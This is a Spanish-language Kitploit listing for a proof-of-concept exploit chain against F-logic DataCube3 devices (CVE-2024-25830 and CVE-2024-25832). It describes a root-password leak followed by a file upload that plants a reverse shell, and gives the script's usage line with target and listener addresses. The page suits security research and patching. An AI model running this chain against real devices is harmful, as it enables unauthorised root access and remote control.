Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25832-PoC — Script de PoC para CVE-2024-25832: Cadena de explotación reverse shell, divulgación de información (fuga de contraseña de root) + carga de archivos sin restricciones en DataCube3 | Kitploit
Herramientas/GitHubGitHub/0xnslabs/cve-2024-25832-poc
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónAprendizaje y Educación
GitHub0xnslabs/cve-2024-25832-poc

CVE-2024-25832-PoC

Script de PoC para CVE-2024-25832: Cadena de explotación reverse shell, divulgación de información (fuga de contraseña de root) + carga de archivos sin restricciones en DataCube3

Ver Repositorio
411hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2024-25830 y CVE-2024-25832 - DataCube3: Control de Acceso Inadecuado y Carga de Archivos Sin Restricciones.

Resumen

Este repositorio presenta una Prueba de Concepto (PoC) para una cadena de explotación de dos pasos dirigida a dispositivos DataCube3. Combina CVE-2024-25830 (Control de Acceso Inadecuado) para extraer contraseñas de root y CVE-2024-25832 (Carga de Archivos Sin Restricciones) para implementar un script de reverse shell. Esta PoC complementa el análisis detallado de vulnerabilidades en la entrada del blog "DataCube3 Vulnerability Report."

Versiones afectadas

Todos los dispositivos F-logic DataCube3 versión 1.0.

Uso del Script PoC

root@kitploit:~
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

Video de la Prueba de Concepto

Script de la PoC CVE-2024-25832

Cadena de explotación Datacube3

Nota

SOLO CON FINES EDUCATIVOS.

Descargar herramienta